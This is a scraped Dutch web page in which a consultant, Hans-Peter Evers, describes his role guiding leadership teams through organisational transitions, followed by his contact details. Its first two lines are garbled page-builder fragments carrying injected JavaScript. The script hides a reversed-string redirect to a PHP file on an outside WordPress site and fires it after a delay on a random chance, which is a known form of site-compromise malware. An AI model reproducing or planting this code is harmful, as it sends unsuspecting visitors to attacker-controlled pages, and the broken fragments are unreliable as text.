) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}top_left” background_repeat=”repeat” global_colors_info=”{}”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_padding=”|||” global_colors_info=”{}” custom_padding__hover=”|||”]

Mijn rol bij transities

Als onderdeel van het leiderschapsteam neem ik een deel van de (statutaire) verantwoordelijkheid op me, om de beoogde veranderingen in goede banen te leiden. Dan kunnen anderen uit het team meer tijd besteden aan de dagelijkse operatie. Mijn ervaring met teams in snel veranderende organisaties geef ik hierbij graag door.

Ik bewaak de ‘grote lijn’, zie snel wat er in het bedrijf mist en wat er ontwikkeld moet worden. Met focus op de strategie en gebruik makend van de ervaring t.a.v. (digitale) processen enerzijds en gedrag van mensen anderzijds. In het ecosysteem van een onderneming hebben deze zaken elk hun eigen plek.

Ik spiegel het team met een scherpe kijk op de kern van de zaak, zodat gezamenlijk gekozen kan worden voor de te nemen stappen. Alhoewel mijn rol vooral niet operationeel is, ga ik doorpakken om tot goede oplossingen te komen niet uit de weg. Mijn ervaring en intuïtie gebruik ik om stappen goed te timen en op het juiste moment op de agenda te zetten. Met rust in het proces, effectief en evenwichtig. Daarmee bouwen we aan stevigheid en structuur, gebaseerd op draagvlak bij alle betrokkenen.

Bij het ontwikkelen van leiderschapsteams voor middelgrote ondernemingen verbind ik graag uiteenlopende belangen en visies van mensen om gezamenlijk succes te creëren. Met inzet van een combinatie van ervaring, wijsheid en betrokkenheid bij de groep. Kennis van mensen, persoonlijkheden en competenties, samen met een empathische kijk, leveren de ingrediënten om verschillende karakters bij elkaar te brengen en het team beter te doen presteren.

 

Ik maak graag een afspraak om hier verder over te praten.

Hans-Peter Evers

E hanspeterevers@tanera.com
M +31 622 791 109

nl_NLNL